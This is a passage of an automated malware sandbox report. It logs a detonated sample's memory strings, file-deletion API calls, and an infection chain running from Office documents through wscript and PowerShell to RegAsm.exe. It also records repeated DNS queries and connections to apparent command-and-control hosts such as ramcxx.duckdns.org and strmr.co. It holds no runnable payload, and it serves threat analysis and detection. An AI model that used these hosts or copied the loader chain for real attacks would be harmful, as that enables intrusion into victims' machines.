                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000E.00000002.473399421.0000000000339000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,16_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,16_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,16_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,16_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,16_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00407877 FindFirstFileW,FindNextFileW,16_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044E8F9 FindFirstFileExA,16_2_0044E8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,16_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,16_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,16_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,16_2_00407CD2

                    Software Vulnerabilities

                    barindex
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Source: global trafficDNS query: name: strmr.co
                    Source: global trafficDNS query: name: strmr.co
                    Source: global trafficDNS query: name: strmr.co
                    Source: global trafficDNS query: name: strmr.co
                    Source: global trafficDNS query: name: strmr.co
                    Source: global trafficDNS query: name: strmr.co
                    Source: global trafficDNS query: name: strmr.co
                    Source: global trafficDNS query: name: strmr.co
                    Source: global trafficDNS query: name: raw.githubusercontent.com
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficDNS query: name: ramcxx.duckdns.org
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 104.168.32.148:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.179.215:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.64.88:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 185.199.108.133:443
